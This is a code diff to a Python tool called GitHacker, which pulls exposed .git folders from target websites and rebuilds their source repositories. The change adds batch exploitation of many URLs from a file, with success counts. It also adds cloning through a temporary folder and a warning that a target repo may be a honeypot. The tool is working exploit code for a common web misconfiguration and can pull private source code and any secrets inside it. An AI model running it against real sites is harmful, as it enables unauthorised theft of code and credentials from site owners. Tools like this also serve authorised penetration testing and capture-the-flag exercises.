@@ -9,8 +9,11 @@ import git
 import subprocess
 import argparse
 import bs4
+import tempfile
+import shutil
 
-__version__ = "1.0.10"
+
+__version__ = "1.1.0"
 
 coloredlogs.install(fmt='%(asctime)s %(levelname)s %(message)s')
 
@@ -24,7 +27,8 @@ class GitHacker():
     def __init__(self, url, dst, threads=0x08, brute=True) -> None:
         self.q = queue.Queue()
         self.url = url
-        self.dst = dst
+        self.dst = tempfile.mkdtemp()
+        self.real_dst = dst
         self.repo = None
         self.thread_number = threads
         self.max_semanic_version = 10
@@ -35,8 +39,8 @@ class GitHacker():
         # Ensure the target is a git folder via `.git/HEAD`
         if requests.head("{}{}".format(self.url, ".git/HEAD"), verify=self.verify).status_code != 200:
             logging.error(
-                "The target url is not a valid git repository, `.git/HEAD` not exists")
-            return
+                "The target url({}) is not a valid git repository, `.git/HEAD` not exists".format(self.url))
+            return False
 
         for _ in range(self.thread_number):
             threading.Thread(target=self.worker, daemon=True).start()
@@ -46,6 +50,8 @@ class GitHacker():
         else:
             self.blind()
 
+        return True
+
     def directory_listing_enabled(self):
         response = requests.get("{}{}".format(self.url, ".git/"), verify=self.verify)
         keywords = {
@@ -63,7 +69,7 @@ class GitHacker():
     def sighted(self):
         self.add_folder(self.url, ".git/")
         self.q.join()
-        self.checkout()
+        self.git_clone()
 
     def add_folder(self, base_url, folder):
         url = "{}{}".format(base_url, folder)
@@ -103,7 +109,6 @@ class GitHacker():
             content = "{}".format(subprocess.run(
                 ['git', "fsck"],
                 stdout=subprocess.PIPE,
-                stderr=subprocess.PIPE,
                 cwd=self.dst,
             ))
             tn = self.add_hashes_parsed(content)
@@ -112,18 +117,23 @@ class GitHacker():
             else:
                 break
 
-        self.checkout()
+        self.git_clone()
 
-    def checkout(self):
-        logging.info("Checkout files...")
-        subprocess.run(
-            ["git", "checkout", "."],
+    def git_clone(self):
+        logging.info("Cloning downloaded repo from {} to {}".format(self.dst, self.real_dst))
+        result = subprocess.run(
+            ["git", "clone", self.dst, self.real_dst],
             stdout=subprocess.PIPE,
             stderr=subprocess.PIPE,
-            cwd=self.dst
         )
+        if b"invalid path" in result.stderr:
+            logging.info("Remote repo is downloaded into {}".format(self.real_dst))
+            logging.error("Be careful to checkout the source code, cause the target repo may be a honey pot.")
+            logging.error("FYI: https://drivertom.blogspot.com/2021/08/git.html")
+        else:
+            logging.info("Check it out: {}".format(self.real_dst))
+            shutil.rmtree(self.dst)
 
-        logging.info("Check it out in folder: {}".format(self.dst))
 
     def add_hashes_parsed(self, content):
         hashes = re.findall(r"([a-f\d]{40})", content)
@@ -298,24 +308,44 @@ def append_if_not_exists(s, suffix):
 
 def main():
     parser = argparse.ArgumentParser(description='GitHacker')
-    parser.add_argument('--url', required=True,
-                        help='url of the target website which expose `.git` folder')
-    parser.add_argument('--folder', required=True,
-                        help='the local folder to store the git repository')
-    parser.add_argument('--brute', required=False, action="store_true",
-                        help='enable brute forcing branch/tag names')
-    parser.add_argument('--threads', required=False, default=0x04,
-                        type=int, help='threads number to download from internet')
+    group = parser.add_mutually_exclusive_group(required=True)
+    group.add_argument('--url', help='url of the target website which expose `.git` folder')
+    group.add_argument('--url-file', help='url file that contains a list of urls of the target website which expose `.git` folder')
+    parser.add_argument('--output-folder', required=True, help='the local folder which will be the parent folder of all exploited repositories, every repo will be stored in folder named md5(url).')
+    parser.add_argument('--brute', required=False, help='enable brute forcing branch/tag names')
+    parser.add_argument('--threads', required=False, default=0x04, type=int, help='threads number to download from internet')
     parser.add_argument('--version', action='version', version=__version__)
     args = parser.parse_args()
-    GitHacker(
-        url=append_if_not_exists(remove_suffixes(
-            args.url, ['.git', '.git/']), '/'),
-        dst=args.folder,
-        threads=args.threads,
-        brute=args.brute,
-    ).start()
+    urls = []
+    if args.url:
+        urls.append(args.url)
+    elif args.url_file:
+        f = open(args.url_file)
+        for line in f:
+            url = line.strip()
+            if url.strip() != "": urls.append(url)
 
+    succeed_urls = []
+    logging.info("{} urls to be exploited".format(len(urls)))
+    for url in urls:
+        folder = os.path.sep.join([args.output_folder, md5(url)])
+        logging.info("Exploiting {} into {}".format(url, folder))
+        try:
+            result = GitHacker(
+                url=append_if_not_exists(remove_suffixes(url, ['.git', '.git/']), '/'),
+                dst=folder,
+                threads=args.threads,
+                brute=args.brute,
+            ).start()
+            if result:
+                succeed_urls.append(url)
+        except Exception as e:
+            logging.error(repr(e))
+
+    logging.info("{} / {} were exploited successfully".format(len(succeed_urls), len(urls)))
+    for url in succeed_urls:
+        folder = os.path.sep.join([args.output_folder, md5(url)])
+        logging.info("{} -> {}".format(url, folder))
 
 if __name__ == "__main__":
     main()
